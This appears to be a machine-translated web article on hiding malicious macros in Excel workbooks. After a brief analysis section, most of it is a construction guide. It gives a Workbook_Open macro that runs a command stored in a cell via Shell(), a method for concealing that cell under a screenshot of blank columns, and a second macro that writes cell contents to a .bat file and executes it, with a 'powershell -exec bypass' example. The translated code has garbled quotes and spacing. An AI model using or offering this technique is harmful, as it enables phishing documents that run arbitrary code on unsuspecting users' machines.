Social Engineering using Hidden Macros in Excel

With the following method, we will do an analysis of a malicious document that contains a macro, which is slightly more difficult than an .exe analysis, but not impossible.

NOTE: Simply running a tool like oledump or olevba will return macros to the document.

All it will show is that the macro extracts code from a specific column and executes it using Shell (), which is shown below to be suspicious:

And if we navigate to BG1 where the code appears, we do not immediately see anything suspicious:

But if you hover your mouse over the BG1 (or just look a little closer and notice the columns that are not aligned), then you will see that there is an image that overlaps the code:


Obviously someone with a little more patience could refine the screenshot of the blank columns and overlay it over the code to make it less noticeable.

Another way to reveal the code extracted from the .excel worksheet is by using MsgBox :

Creating the document

What's needed:

  1. Screenshot of a set of blank columns to overlay over code, for example
  2. Macros that extract code from the workbook and execute data:
Private Sub Workbook_Open () Data = Sheet1.Range ("BG1") Shell (Data) End Sub
  • Data = Sheet1.Range (“BG1”) Just look at the row in BG1, extract everything in the row and place it inside the variable  Data
  1. Code that will be exported and executed when the document is opened and the user clicks on "Enable Content"
powershell.exe -exec bypass -C echo "Hello world"> C: \ Users \ Desktop \ Conduct \ Desktop \ test.txt

After entering the code in any column you want, simply insert the image of the blank columns above the code (Insert> Illustrations> Images)

Then import the macros into ThisWorkbook and change the section  Range ()  to match your column. If you entered the data in column A and it is in the 1st row, it would be  range (“A1”)

Compose multiple lines in a file

Writing multiple lines in a file is a simple piece and only requires adding a few lines of code.

The macro code used is here:

Private Sub Workbook_Open ()

1. Dim Path As String

2. Dim FileNumber As Integer

3. FileNumber = FreeFile

4. Data = Sheet1.Range (“BG1”)

5. Data2 = Sheet1.Range (“BG2”)

6. Path = “test.bat”

7. Open Path For Output As FileNumber

8. Print #FileNumber, Data

9. Print #FileNumber, Data2

10. Close FileNumber 11. Shell (Path) End Sub

  • Lines 1-3 are static, keep them as they are. They just define the variables used
  • Lines 4-6 are dynamic. You will need to change the strings to 4 & 5 so that it is where your code is in excel worksheet terms. Change line 6 to the file path you want.
  • Lines 7-9 are also dynamic, just open the file and write the extracted data to the file. Lines 8 & 9 in particular are the lines that are responsible for compiling the data in the file.

Just enter the code you want to write to a file, note the column and row in which it is located, and change the Data & Data1 variable to fit your column and row (add more variables if needed).

Registration in via Email

Enter your email to subscribe to the email notification service for new posts.

Then overlay the code with the blank line screenshot and you're done!



Read them Technology News from all over the world, with the validity of

Follow us on Google News at Google news